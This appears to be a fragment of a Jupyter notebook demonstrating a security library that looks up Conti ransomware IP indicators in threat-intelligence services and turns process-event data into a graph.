1185.141.63.120ipv4185.141.63.120NoneXForceFalseinformationAuthorization failed. Check account and key details.<Response [401 Unauthorized]>https://api.xforce.ibmcloud.com/ipr/185.141.63.120401
282.118.21.1ipv482.118.21.1NoneXForceFalseinformationAuthorization failed. Check account and key details.<Response [401 Unauthorized]>https://api.xforce.ibmcloud.com/ipr/82.118.21.1401
385.93.88.165ipv485.93.88.165NoneXForceFalseinformationAuthorization failed. Check account and key details.<Response [401 Unauthorized]>https://api.xforce.ibmcloud.com/ipr/85.93.88.165401
\n", "
" ], "text/plain": [ " Ioc IocType SanitizedValue QuerySubtype Provider Result \\\n", "0 162.244.80.235 ipv4 162.244.80.235 None OTX True \n", "1 185.141.63.120 ipv4 185.141.63.120 None OTX True \n", "2 82.118.21.1 ipv4 82.118.21.1 None OTX True \n", "3 85.93.88.165 ipv4 85.93.88.165 None OTX True \n", "0 162.244.80.235 ipv4 162.244.80.235 None RiskIQ True \n", "1 185.141.63.120 ipv4 185.141.63.120 None RiskIQ True \n", "2 82.118.21.1 ipv4 82.118.21.1 None RiskIQ True \n", "3 85.93.88.165 ipv4 85.93.88.165 None RiskIQ True \n", "0 162.244.80.235 ipv4 162.244.80.235 None Tor True \n", "1 185.141.63.120 ipv4 185.141.63.120 None Tor True \n", "2 82.118.21.1 ipv4 82.118.21.1 None Tor True \n", "3 85.93.88.165 ipv4 85.93.88.165 None Tor True \n", "0 162.244.80.235 ipv4 162.244.80.235 None VirusTotal True \n", "1 185.141.63.120 ipv4 185.141.63.120 None VirusTotal True \n", "2 82.118.21.1 ipv4 82.118.21.1 None VirusTotal True \n", "3 85.93.88.165 ipv4 85.93.88.165 None VirusTotal True \n", "0 162.244.80.235 ipv4 162.244.80.235 None XForce False \n", "1 185.141.63.120 ipv4 185.141.63.120 None XForce False \n", "2 82.118.21.1 ipv4 82.118.21.1 None XForce False \n", "3 85.93.88.165 ipv4 85.93.88.165 None XForce False \n", "\n", " Severity \\\n", "0 high \n", "1 high \n", "2 high \n", "3 high \n", "0 high \n", "1 high \n", "2 high \n", "3 high \n", "0 information \n", "1 information \n", "2 information \n", "3 information \n", "0 high \n", "1 high \n", "2 high \n", "3 high \n", "0 information \n", "1 information \n", "2 information \n", "3 information \n", "\n", " Details \\\n", "0 {'pulse_count': 45, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... \n", "1 {'pulse_count': 35, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... \n", "2 {'pulse_count': 36, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... \n", "3 {'pulse_count': 22, 'names': ['MS-ISAC: Joint Cybersecurity Advisory: Conti Ransomware', 'Conti ... \n", "0 {'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... \n", "1 {'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... \n", "2 {'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... \n", "3 {'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... \n", "0 Not found. \n", "1 Not found. \n", "2 Not found. \n", "3 Not found. \n", "0 {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 35, 'detected_urls': [... \n", "1 {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 19, 'detected_urls': [... \n", "2 {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 42, 'detected_urls': [... \n", "3 {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 7, 'detected_urls': ['... \n", "0 Authorization failed. Check account and key details. \n", "1 Authorization failed. Check account and key details. \n", "2 Authorization failed. Check account and key details. \n", "3 Authorization failed. Check account and key details. \n", "\n", " RawResult \\\n", "0 {'whois': 'http://whois.domaintools.com/162.244.80.235', 'reputation': 0, 'indicator': '162.244.... \n", "1 {'whois': 'http://whois.domaintools.com/185.141.63.120', 'reputation': 0, 'indicator': '185.141.... \n", "2 {'whois': 'http://whois.domaintools.com/82.118.21.1', 'reputation': 0, 'indicator': '82.118.21.1... \n", "3 {'whois': 'http://whois.domaintools.com/85.93.88.165', 'reputation': 0, 'indicator': '85.93.88.1... \n", "0 {'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... \n", "1 {'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... \n", "2 {'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... \n", "3 {'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... \n", "0 None \n", "1 None \n", "2 None \n", "3 None \n", "0 {'asn': 19624, 'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-03 16:53... \n", "1 {'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-05 03:45:47', 'positiv... \n", "2 {'asn': 204957, 'undetected_urls': [['http://bkgs0007.nov.com/', 'fe9ad6fcfd8214a3898853b5dec208... \n", "3 {'asn': 8972, 'undetected_urls': [['https://bbb.edu-cisco.org/', '6adc598e2c5362b5f5facad921d0f0... \n", "0 \n", "1 \n", "2 \n", "3 \n", "\n", " Reference \\\n", "0 https://otx.alienvault.com/api/v1/indicators/IPv4/162.244.80.235/general \n", "1 https://otx.alienvault.com/api/v1/indicators/IPv4/185.141.63.120/general \n", "2 https://otx.alienvault.com/api/v1/indicators/IPv4/82.118.21.1/general \n", "3 https://otx.alienvault.com/api/v1/indicators/IPv4/85.93.88.165/general \n", "0 https://community.riskiq.com \n", "1 https://community.riskiq.com \n", "2 https://community.riskiq.com \n", "3 https://community.riskiq.com \n", "0 https://check.torproject.org/exit-addresses \n", "1 https://check.torproject.org/exit-addresses \n", "2 https://check.torproject.org/exit-addresses \n", "3 https://check.torproject.org/exit-addresses \n", "0 https://www.virustotal.com/vtapi/v2/ip-address/report \n", "1 https://www.virustotal.com/vtapi/v2/ip-address/report \n", "2 https://www.virustotal.com/vtapi/v2/ip-address/report \n", "3 https://www.virustotal.com/vtapi/v2/ip-address/report \n", "0 https://api.xforce.ibmcloud.com/ipr/162.244.80.235 \n", "1 https://api.xforce.ibmcloud.com/ipr/185.141.63.120 \n", "2 https://api.xforce.ibmcloud.com/ipr/82.118.21.1 \n", "3 https://api.xforce.ibmcloud.com/ipr/85.93.88.165 \n", "\n", " Status \n", "0 0 \n", "1 0 \n", "2 0 \n", "3 0 \n", "0 0 \n", "1 0 \n", "2 0 \n", "3 0 \n", "0 0 \n", "1 0 \n", "2 0 \n", "3 0 \n", "0 0 \n", "1 0 \n", "2 0 \n", "3 0 \n", "0 401 \n", "1 401 \n", "2 401 \n", "3 401 " ] }, "execution_count": 102, "metadata": {}, "output_type": "execute_result" } ], "source": [ "iocs = ['162.244.80.235', '185.141.63.120', '82.118.21.1', '85.93.88.165']\n", "\n", "ti_lookup = mp.TILookup()\n", "\n", "ti_lookup.lookup_iocs(iocs)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## DataFrame to Graph\n", "\n", "New in V2.0 - builds on previous Alert and Incident graph modules\n", "but in generic form" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "proc_df.mp.to_graph" ] }, { "cell_type": "code", "execution_count": 103, "metadata": {}, "outputs": [], "source": [ "nxg = proc_df.mp.to_graph(\n", " source_col=\"SubjectUserName\",\n", " target_col=\"NewProcessName\",\n", " source_attrs=[\"SubjectDomainName\", \"SubjectLogonId\"],\n", " target_attrs=[\"CommandLine\", \"ParentProcessName\"],\n", " edge_attrs=[\"TimeGenerated\"]\n", ")\n" ] }, { "cell_type": "code", "execution_count": 104, "metadata": {}, "outputs": [ { "data": { "image/png": "iVBORw0KGgoAAAANSUhEUgAAAb4AAAEuCAYAAADx63eqAAAAOXRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjUuMSwgaHR0cHM6Ly9tYXRwbG90bGliLm9yZy/YYfK9AAAACXBIWXMAAAsTAAALEwEAmpwYAACBlUlEQVR4nO2dd1hTdxfHPwlhKSoq7r333nu2bqvgFrXuXbWtdXVY96xaq2KtdVetgnsrAlbFVRcqKIpbVEREZCa57x+8SQkEyEIZv8/z9KnmjtwL8X5zzu+c75FJkiQhEAgEAkEWQf6pL0AgEAgEgo+JED6BQCAQZCmE8AkEAoEgSyGETyAQCARZCiF8AoFAIMhSCOETCAQCQZZCCJ9AIBAIshRC+AQCgUCQpRDCJxAIBIIshRA+gUAgEGQphPAJBAKBIEshhE8gEAgEWQohfAKBQCDIUgjhEwgEAkGWQgifQCAQCLIUQvgEAoFAkKUQwicQCASCLIUQPoFAIBBkKYTwCQQCgSBLIYRPIBAIBFkKIXwCgUAgyFII4RMIBAJBlkLxqS9AIBAIPiYhETHsvvIU/+BwwqOV5LRTULFgTnrWKUpeB9tPfXmCj4BMkiTpU1+EQCAQpDXXn4SxyisQ77uvAYhRqrXb7BRyJKBlhXyMaVGWGsUcP81FCj4KQvgEAkGmZ6vvQ+Ye9idaqSKlJ55MBnYKK2Z0rIhrw5If7foEHxeR6hQIBJmaeNG7Q1ScOtV9JQmi4lTMPXwHIFnxE+nSjI2I+AQCQabl+pMw+qzzJSpOZfSx9tZW7BzRkOpFHXXOJ9KlGR9R1SkQCDItq7wCiVYaL3oA0UoVq70CtX/f6vuQPut8OXHnJTFKtY7oxe8f/9rx2y/ps86Xrb4Pzbl0QRoiUp0CgSDdYYlUYkhEDN53X6e4ppcSkgSnA17zJiKGI34vRLo0EyFSnQKBIN1gyVSim/d9lp28myQyMwY7hZze9Yrx9+WnIl2aiRDCJxAI0gWWrrycuPMqe689N/u6CuWyIzg82qTIUSaDdpUL4OZaFxDVpekFkeoUCASfnLSovAyPVlrk2l6aKHqQ9ulSgWmI4haBQPBJuf4kjLmH/Q0ShIRExamZe9ifG0/D9G7PaZc+vtfLgF8976XJPQpMQwifQCD4pFiy8jIhFQvmxFZh3iNOLgO1mYtB0f+v9EyLexSYhhA+gUDwybBk5WVietQpaubVWQ5LpUsFlkEIn0Ag+GTsvvLU7HPIgN3/Jj2Pk4MtLcrnQyYz8bwyKJDTzryLsxDJ3aPANNJHElwgEGRJ/IPDzWo3gPhUov+L93r74grlssPWSk60Ce9hp7Di88oF2HHpiVnXaKl0qf+L9+adRKBFCJ9AIPhkWKry8p/A1zRZ+AJI2hcXp1IbLT721nJmdKxI+6qF2HHpiVnXZql+sfDoOAudSSCETyAQpAmGOJNYqvLydUSs3tcTR3oyUhYiff1zLcrn48Sdlyb38RXMacuLd+avz+W0szb7HIJ4RAO7QCCwKMY4k5x/8MZsdxVjkMtALpOhkMt0RFFzXa0q5GNMy7JJnFbMMbruVbeo2elSO4WcEc1Lk81GISzOLIAQPoFAYDGMdSaZ0KYsy07e+2jCB/Ei0qdeMbzOX8QmuyNVypWmYqEc9KidvIAY02CvIT5dWon2VQvRZKGn2euECrkcmUxYnFkCIXwCgcAimCoOJfJmJ+Dle5PL/Y1FYyNWJOgITk5OjB492qDjzLEbG7HlssnpUkMQFmfGIdoZBAKB2ZjjvhIU8gEb+cd7FGn64rB1ICoqyuDjXBuWZOeIhrSrXAAr1Fihe692Cjm2CjntKhdg54iGOgI0tmVZ7BRWlrqFJCS0OBPjkFJHRHwCgcBszIloZDKoVDAHQSEfjBZOU7FTyGmQLYTy6sfMmDHD6OOHjP6KbFXbYO1UgvDoOHLaWadJutQU9E2EEOgiqjoFAoFZWMJ95f7rD3zdthzLTwWmmkq0BNFKNaGSvU7EZ8x8vHt+V/lj4lgqVKiQ5NwpnQeIj4xjlZjcWZ/qvcVbnGkmQgiSIoRPIBCYhaXcV5DJ2DmiIau9Ajkd8BoZuu0IMlUcCmtrHLPZJNu+YAxxKIiKikqlCjWYZSfv6hSPfPjwgRcvXlCmTBmd8xl6nqltS/Lz+r0oilVHLktaXaqWJJRqyeSm94QWZ6LaUz9C+AQCgVlY0n1lZPMyuLnW5U1EDLv/fYr/i/faVGLI/evkDQ+Ess4WmbPnYCvHX5mPPut8k40yNaJ0/PZLfO6GMKNjRSoqQihfvjwKxX+Pz9QKXxKe59StF1TLp+DPqW2S3GPFQjn4EKNkrc8Ds36mGouzkc3LiEnvehDCJxAIzMJS7isJnUnyOtgysrluRPXkSV46dFjMqM9csVXIze6LU0pwx64SagP68xIWj7TO844qVapotxk7S1CJHH+7yhzxe5HkHiF+gK4lvkicv/+GK4/eGhzJZiVEVadAIDALS7mvpOZMUqxYMSpUqED+Dw/Mfi+VJHHrLajlxl17VJyao8HZcCxdHTC9mjVGJSU7Z89SXyR87r3mxJ2XxCjVSYQ0+v+vHb/9kj7rfLNcJagQPoFAYBaWmHtnp5BTsVCOVPdzcXHhxAEPs6cu5M5mg6lBlQoZ15UFgbSZJWipLxJqiVSLhLJqG4QQPoFAYBAhETG4ed9n4s6rDNl0iYk7r+LmfZ82FfObfW4J6FE79fl5nTp14syZMwysW8DkvjhbKzlvI2NNN4+Wybn2Mo57L9+nySxBS3yRMJasNuld9PEJBIIUMcR7M5e9Na/fx5gkJhonFUPL70eMGEHz5s2hbFOTnGKalXPC+26I2WuEDcvk5fz9N2afZ9Jn5XXW+kIiYsy2ODMFY38PGRkR8QkEgmTZ6vuQPut8U10remWi6EG81daYlmUN3r9Hjx64u7vj2rAkMzpWwt7aKtW0p0wW39g9o2MlstkoLFI8EvgqwmLVrAkxd4CuqWSlSe9C+AQCgV7+q1ZMu4Zye2s5E9qU5dz9N0lSqMk9gFu2bElgYCCPHz/WsRGzVcixS5Qi1GcjZqnikahY09b2EqNvzl5aW5wlR1aZ9C7aGQQCQRJMrVbUkNrcO5CQqVWUyJubZSfvAYaX29vY2NClSxc8PDyYOHEi1Ys6Jun9e/M+kn88jzNhhCu96hbT6VezVPGIvY0VfDD/PPqqWWsUc2RGx4r8vP8mcdLHi0+yyqR3EfEJBIIkmFOtCJA/h22KEVilgjmQJAj4f/O7seX2Li4uuLu7k7BEQdP7t6x3TTYPa0zBh8dpW0RK0qRtqSrUsvkd0rSatXbOSOTX92GrkBmUypVbKDWaFSa9C+ETCAQ6mOu9CRAWFcehcU2Z9Fl5utcsQpuK+eleswiTPivP123L8fBNJFgpkEj5aZ1cuX3t2rVRq9Vcu3Yt2WNr1Kihd3uPOqlXj6aGBMzoUMki59FXzRoVFcX48eOZPehzdo1sbFAqt1k5J7OvB7LGpHeR6hQIBDpYynvzVMCrJM4k/00zN3580dzD/lQv6kj1oo7IZDJcXFzw8PCgVq1aeo+pUaMG169fp2fPnjqva4pHzJkm0apCPsoVyGGR8ySMSDX2YjuP/UNEzX6ck8oRev8Nc7tVA9BrcaaZCOHmfR/fB6FmV5ka0k+Z0RHCJxAIdLCk92ZiLNHwrSm3d3Z2pmvXrvz4449YW+tZJ6tRg0OHDuk919iWZTlzL4QoA+zKEpOwCtVS50nYMqJWq4mTnMAG9l57nmS9U5/NGcRHsstO3jX6OhJiaD9lRkekOgUCgQ5p4b0JlhlflLDcvmTJkpQqVQovLy+9+1erVo07d+4QF5d0zUpTPCJTGbeeZS2XmNGxonbWneY89tbGPUrtreXa8yRuGUkcDBtqL2ZuG4RMBo3L5GXXlacGV9hmVITwCQQCHdLKe9NSKdSE5fbOzs54eHjo3dfBwYGiRYsSEBCgd7trw5IUeH4WWyvDikdkqjhG1sunM1ldcx5tP2Fq15+gn9C1YUmjWkYMsRcb1qgYMpVpX1xkwD+BISw7eZe9157j6f+Kvdees/zkXRov9GTk1stcfxJm0rnTG0L4BAKBDmnlvZkWKdQuXbrg5eVFeHi43v0163zJUSTqAT80yaEtHrGx0pUuTfFImwpOyDyXM6FTbb3n0fQT5ot5hkImYZvMeRL2E5raMpKcvVh4eDgLvhtNlbgA7IyMQCHe2zNOJWUJQ2uxxicQCHRIq7WitEih5smTh8aNG3P48GH69OmTZN9yVWux48YbLimu6p1FZ29vT2HbONxcm/EmIoaVhy7hccqXek1a6BSPPAzw41k+e71riRoK2yl5f2QZJ0+fYYrbHl6prSldoUqSIhQNllzvDA0NpV+/ftSpU4fZs7/lr4uPU5wPqCH1fsv/SBhxAkki34yEED6BQKCDpaoeE/fPpVUK1dnZmY0bN+oIn6ZY5PTDfChx5GaCwbUJi0VicxQiKioKiO8D/KyoDL9QX9YP+lbnPQ7duqUzg08f7u7ufP755xTIlZ3b7r+yf/9+SpUqpXdfS653xr4PpW/fvrRv354pU6Ygk8lwbViS6kUdk51mb6eQo5IkVGrJ6GtIXGGbERGpToFAkARzLLOS895MqxRq27ZtuX37Ns+ePQN0/UXj1CDJdYUyYeruSq6mnHocq932/v17cuRIWs5/KxXhkySJHTt20LdvX3bt2kXdunWTFT2w3HrnulM3cXZ2plevXkydOhVZgsVKjaPNuSmt9fZTNinjZLK/anIjlTIKQvgEAkESTK1WlKniqKt4TLUiuZJss1TjeOIUqq2tLZ06dWLPnj1GF4uoZAoOPLHWrluFh4ebJHz//vsvsbGx1KtXjz/++IPhw4en+N6WWu/80+MYY8aMYcyYMcnul9DRZv2geizrXROX2kU5/+CNxUcqZRSE8AkEAr1UK+JISafsBu2rqVac0q48r8668+OPP6JW6z7YLVFury+FCvEWZn8dPcscI8cUAcRJMm2xyPv378mZM6fOdpVKRUBAAJUqJe/UsmPHDvr06YOXlxd2dnY0atQoxfe01HpnucrVGTBggNHHpUWFbUZCrPEJBIIkxEdO/gYXX1QqmIMFztWpXtSRvnX/ZtCgQXzzzTcsXrwYheK/x4ylGr4TU69ePd4UrEusiabamtRdBT0RX1BQEPnz59cbCQJERkZy6NAhPD09mThxIsOHD9dJOerDUuud5UsW0/m7xvnFPzhcbzGPhrQ0KcgICOETCAQ6/JcuNPzBGBTygRtPw6he1JFcuXLx119/MWTIEMaMGcNvv/2GjY0N8F8K1ZQBsgkbxxMTGhmHMl95k9esNKm73IooiufPrbPt1q1bVK5cOdljDxw4QL169Xj79i0BAQF07do11feLeRmETC1Psv5oDAnXO1MeFpx00kVamRRkFESqUyAQaLFUb1m2bNnYuHEjSqWSoUOHaisnAaMGyKJWI1PHaRu+k2P3ladYWZk3v04G3PqQPUlkl9r6nibNuX79egYOHIitbdJUbEKCgoLw2bQIhcLGrOvVrHcaOiw4YR9eWlXYZhSE8AkEAi2W6C3TYGdnx9q1a3F0dMTV1ZX37/9Lixk6QLZJqRzEHVmMzeOLKb63f3A4sSrzpuVGK9WEKG2NEr7AwECCgoKoWbMmh056I1Vsm6LdV1xcHOPHj+frMcNpVTG/2eudR/xemOT8EhmrStORSukdmSSl1WxlgUCQkQiJiKHJQk+z1n5sFXLOTWmts56kVquZPn06N27cYOvWreTJk0fnmIQDZPVNHZg2bRo7duzg5s2bODg46H3fIZsu4en/yuTr1pA78im/dCtPq1attK/VrFmTw4cPU7hw4ST7z5s3j+BYW25JRQiKyYa1tXWiNKMcCbRpxuM71nH9+nW2bNnCjafv/j+pwvgvGvbWVsz+ogo/7Ltl0vG2CjlxSiVqM2Iffb/rjIJY4xMIBIBlK/0SThCQy+XMnz+fefPm0aNHD7Zv306BAgW02zXl9skxd+5cDh8+zKBBg3B3d9e7j6VSd1LMBx1xffXqFUqlkkKFCiXZV6lUssX3Ierq3YiJU4FcrjfNCHD89ktO+7/E6sY9vP/4BZlMRo1ijriUlrH1dixYGZ721Kx3Hr/90uToPCZWiS2xxMrtTFoXTanCNiMgUp0CgQBI20o/mUzG9OnT6datG87Ozjx58sTgc8rlcjZu3MiFCxc4ePCg3n0s1Rwve/dCp51Bk+bUV6X54+YTRFfqSIxKAnnK7y1JEKsCVbUvOP4gEoA7d+6w/5fJDKuTx6D1zoQG1+2rFjJvWLBcjtra3uSfWUoVthkBEfEJBAIg7cYRaZDJZHz11Vc4ODjg7OzM9u3bKVs2/uGZWhl+rVq1cHFxYeLEibRt2xY7Ozudc1vKX5QgX3LkmKR9LbmKzutPwtgREGt0VWasGuYe9qdYdonvhn3Jzz//TPfuLej6NCxFezGJ+AhrTMuy8Y4s3vdNu8kEWMlktCifD597r40qZrKSQbNyeSniaG/2NXwqhPAJBAIg7bw0EzNkyBCyZ89Oz549+WH5Hxx9LBlUhv/LL79w4sQJhg8fzpYtW3TOaSl/0VM7gpNEfG3atEmy/7Jjt0xeH4uOUzF+zQEG9epF9+7dgf/sxV6EvmfgzNW8lbJRtVY9cme302twbanoPJuNghkdKxlkaK1BJYHP3RAaL/TUaZHISAjhEwgEgCZdGGzWA9XQSr/evXvzb3h2vj74GJnCRu86U8L1MZ+7IczoWJE//viDXr164eXlRcuWLXX2N7c5fmSzUhyOiSF79v/cam7dusVXX32ls29IRAxn7r9NNb2ZHBIQkbMkg0Z8rvN6ZGQk34wbScns2Tn4228ptkVYMjpPzdBaH/p+NxlpWoNY4xMIBEDaeWnqY6vvQ/Y/sYJkRE/nnAnK8B/IC9O+fXtGjRqVZLK6qf6iqGKZ0bEiJXPKcXBw0K7nRUZG8uzZM206VsPuK09QmTjsVYONtTXuV59p//7u3Tv69etHgQIFWLNmTaq9gJaOzhMaWrconw8rA/ssDBmOmx4RwicQCAALeGliWKWfuU3yY75fgFqtZvz48Un20TTH21nLQZ3y+WWy//cL3jqEa8OSRERE6PTw3blzh3LlyiWZwXf21kOwMq9xO2ERUEhICD179qR69eosXbpUx+ItOdJq0sXTt1H43AtBZWS+OLnhuOkVIXwCgUCLOeOIJGUsVgGeREREpLifuU3yv//zkFWrVnHw4EEuXbqUZB/XhiX5e0QjSlqHY4U6SXO8rZVMOw1986BaqAK8gKSTGZJrXL/30DLGzOHRcTx79gxnZ2c+++wzfv75Z+QGpk971Clqsj2bBn3RuSUNDNIzQvgEgixKSEQMbt73dZxGzj94w4Q2ZY1OF9pby5nWoQK2H4Jp1aoVR48eTfY9LTGAtXaj5jRr1ozBgwcnmQIB8am7tQPqkvP0Iia0KUf3mkVoXTE/UtAF2haI4dyU1ri51qVu6fxER0cjSVKSWXy3b99OInwRERG8fvbYtItPhFwZjbOzM/369WPy5MmpGlsn5M7Vi8hf3AbJtPVYfX14lhyOm94RxS0CQRYjNUNjCSidLzsPXn8gVqVO8UEYny60+q+4ofUvnDt3jqlTp/L3338ze/ZsihQpot3fkk3yf/75J1WrVmXy5MksXbo0yX4VKlQgX057qlq9YHTvZgA0cvsKleMr8jrEV1PK5XJsbW2Jjo7WG/Fpqi417N+/nxKOCh6o4sxKd9pYyfjn0C6+/+or+vfvb/Bxb9684eeff8bb2xub3MWJzVsWtcz4+EVfH15aGRikR0TEJxBkIQw1NPYPfg9S/LihlLw021UuwM4RDXUq+ho3bsyJEyeoVq0a7dq1Y926dSiV8cUglmySt7e3Z+nSpezcuRM/Pz+9+7q4uODh4aH9e40aNbhx44buvdjZERUVpTOLT6VS4e/vn2QG3/bt22lYQGZUdKaP2NhYvu/XxmDR00x4b9myJVevXsXOzo4l08czq3sNk6JzfZMustKoIhHxCQRZBGPGDUkSxKjUBIV84Ou25UAmS9ZLUx+2trZMmjSJrl27Mm3aNNzd3Vm4cKHFm+S7devGhg0bGDBgAP/++28SQerWrRutWrUiKioKe3t72rRpw5EjR5AkSbuvvb29Vvg0EV9QUBD58uXT6em7e/cuz549Q5LOUr1ldW6EYlpaUK2mdkFb+vfoYNDugYGBTJ48mSdPnhAXF0fXrl0ZN24c9vb/NZAb0oeXJDpPRFYaVSQiPoEgC2BOJeXyU4E0Kp2XZb1rsn5QPZb1rsnI5mUM8mksU6YMO3fuZNiwYQwaNIiggNum3oIOCZvkt2zZQlhYGD/99FOS/QoUKEDNmjU5duwYAK1bt0alUvH48X/rdBrhCw8P1wqdvsKWHTt20LRpU0JDQ5nZs5HJRUA21nJm9kp5QjtAdHQ0S5YsoXPnzgQFBVGhQgWOHDnC5MmTdUTP0EkX+qLzhGSlUUVC+ASCLMCnrNaTyWT06NEDT09PHJRhoDIvIkhchp8zZ07mzp3Lhg0buH8/qZWXi4uL1tw6b9682NnZaYUQ4oUvOjpaJ+K7ffu2jlVZbGws7u7uhIaGMmTIEGqVyMOMjhXj2yaMwNZKxo+dqyQ7UFfD2bNnad26NTt27CB79uzMnz+frVu3UqpUKb37J+zDm/RZebrXLEKbivnpXrMIkz4rry3mSe59lUolNpGvkUumfUY0ZJRRRUL4BIJMTnqp1suTJw8bfhyVpC/O6OshaRl+v379qFy5Mv369Uuyf4cOHbh8+TKvX8cX8xQvXhwfHx/t9mzZsiVJdSaO+E6ePEnRokW5evUqvXv3BuIjreYOr5Gp41LtGUStxtZKxg+dK6focBIaGsqECRMYNmwYb968wcXFhTNnztChQweD1hU1ky6W9a7JQpfqVCiYgzsvwpnsfiPJfEC1Ws3FixeZPn06derU4cbedchMKJRJiKEGBp8ascYnEGRyPka1Xmom0xqcHGxpVbEAJ26/NK0PTVLTrIyT3jTrtm3bqFOnDosXL2by5Mna17Nly0bbtm3Zt28fw4YNo27dupw8eVK73d7ensjISJ3ilsTCt2PHDnLnzk29evW04nj//n3OblqIU9GKFGw9iID3MmJjY3WqPRWoUapUNCubl8kdqyUbcUmSxK5du7S9fFWqVGHBggVJXGMMIbWq3aXH/SksCyP8/C4c1e/o1q0b+/bto2TJkozYctlsv9OMMKpICJ9AkMlJy2q91B6yCU2mNUbG5nhqylETdMiNt1+UJ3fu3DrbnJycmD59OnPmzKFfv346bRQ9evRg4cKFDBs2jHbt2rF9+3bUajVyuVxnjc/BwYFXr14RGxurHTz74sULLl++jEwmY/78+UB8tDR58mTKly9P4cIFWTy+Ld16u5K/YVfyla3Ju+g4ngQGEBJ4nW1zxlO5TPFk7ykwMJBvvvmGwMBAFAoFs2fPpkuXLiZVjsYXMCVf6KLx2HxELmwbjeDrTpUZ0Kikdru5fqcZZVSRSHUKBJmctKrWM7Q14vjtl/RZ56v1cjTVU9NaLmHtd5CyeWzo2bMnr14lnbg+cuRISpcunSTl2bRpU4KDgwkMDKRx48ZIksSdO3cA3arOnDlzahvXNcKza9cuypUrR+PGjSlWrBgQX1ATEhLC8+fPmTNnDhMmTKBiqaJsmT6IpT2rUzBgD4rL2zi1alqyohcTE8PSpUvp0KEDt2/fplevXpw9e5auXbuaIXp3iIozZMqCjBiVxLwjuh6bpv5ukmuRSK8I4RMIMjmWq9b77zzGPGT1GRlrPDWNGcD6U5eq/DntS86fP0/JkiVxdnbm2bNnSfbfvn07Dx48wM3NTfualZUVX3zxBbt378be3p6cOXNy5MgRIGk7Q8I0p1qtZseOHTx79owRI0YA8OzZMxYtWsTbt29ZsWIFbm5uhISEsHjxYlQqFRMmTMDf35+dO3eSJ08evfd0/vx5mjVrxrp166hYsSIHDx7kp59+0pn+bgzm+p8m9Ng05nejoaRTdqoVcTTqvT8lQvgEgkyOJQyNUcVxymMrc+bMYfuxc8wxsB8wIYkfsqmV4cvVSmysZDpl+E2aNGH37t34+flRokQJunfvnqSSs3DhwkycOJH58+drC1ogvrpzz549qNVqypQpw7lz54Ck7QwJhe/ChQvExcWRP39+6tatiyRJfPfdd+TJk4f+/fvz6NEjDhw4wPr165EkiREjRhAWFsa2bdt0egA1hIaGMnbsWAYMGMCHDx+YP38++/fvp0KFCkb9LBPy/v17ZmzzJirWtGpZfVW7mt9NpYKGVWj6B7/XierTO0L4BIJMjiXGDdna2rLqG1dsbGyYs+ci0TGmpU8TP2STK8P/onpBmuQKw/rwz9SMuEylAv/NyCtfvjz79+8nNDSUQoUK0aNHD27f1u0P/OabbyhUqJCOM0qVKlVwcHDg4sWLNGzYkHv37gEpR3zbt2/HxsaG4cOHI5PJcHd3x9/fHwcHB5o0acK8efPYvHkztra2DBo0CGtra9avX6/TZwfxxSt///03jRo14ujRo/Ts2ZPz58/TvXt3nbSmPv/UhJWYGqKiojh06BDDhw+nbpNW3AqTgYkVmclV7d54GkZQyAeDz5GRxhPJJMnUImeBQJBRMLdar13lAri51iUkIoYmCz3NKpaxVcg5N6W1QdV/QUFBTJ8+nZCQEBYuXEjt2rW12yIjIxkzZgxPnjzh9evXbNy4UWf7/fv3admyJfPnz8fV1RWA1atXExQURL9+/ejSpQsPHz5k5cqVxMXFsXLlSm7fvk3NmjXx9/cnKiqKunXrkj17di5evEhYWBgtW7ZEkiTWrFnDhAkT+PXXX6levToDBw6kfPnyLFy4ECsr3cb2Bw8eMG7cOO7evUvJkiVZsWJFkub4lIuE5EhA83JONMz5jhunD3DixAmqVq1Kt27deJmnOm5nn5g9QHjSZ+W1VbvXn4TRZ52vSUUu9tZW7BzRMF2v94mITyDIApgzbihhtZ4lWyMMoVSpUvz111+MHTuWYcOGMX36dMLDw4H4NoX169fTsGFD7O3tGTBgAGfPntUeW6ZMGYYOHcr333/Pu3fvgHgLs8OHD1OhQgVkMhkXLlzA3t6e8PBwsmXLxr1797Qz+Pbu3YujoyNDhw7F2tqaqVOnYmVlxddff83333/Pt99+S6VKlejRowe1a9dm8eLFOqIXExPD/Pnzadu2Lffv32f27NkcP348iegZWiR04lYwc85HEFu8PqdPn+bvv/+mX79+PHoXZ/Gq3cw+nkgIn0CQBbBUtd6nMDKWyWR069YNT09PlEolrVq14sCBA0iShJWVFXPmzGHw4MHIZDKGDx+u06P3008/kSdPHgYOHAjEr/9VqVIFT09P8ubNy7Fjx7TClzjNuXXrVt6+fUv//v05fPgw58+fp1atWhw7doy2bdvSqlUrunfvTseOHfnpp590Upbnz5+nYcOGrF27li5dunDhwgX69u2bZN6eUZWYcjmS3Bqvd3k4ERSlfdnSVbvpxfAgLRHCJxBkEUyppJzRsZKO04ilHrJhUbFGH+Po6MiiRYtwc3Nj2bJlDBw4kMePHyOTyRg1ahQLFixAkiTGjx/Pvn37/n8fMrZs2cKVK1fYu3cv8J+FWcWKFbl48SL29vbaVgaN8N25c4eHDx/i4uKCTC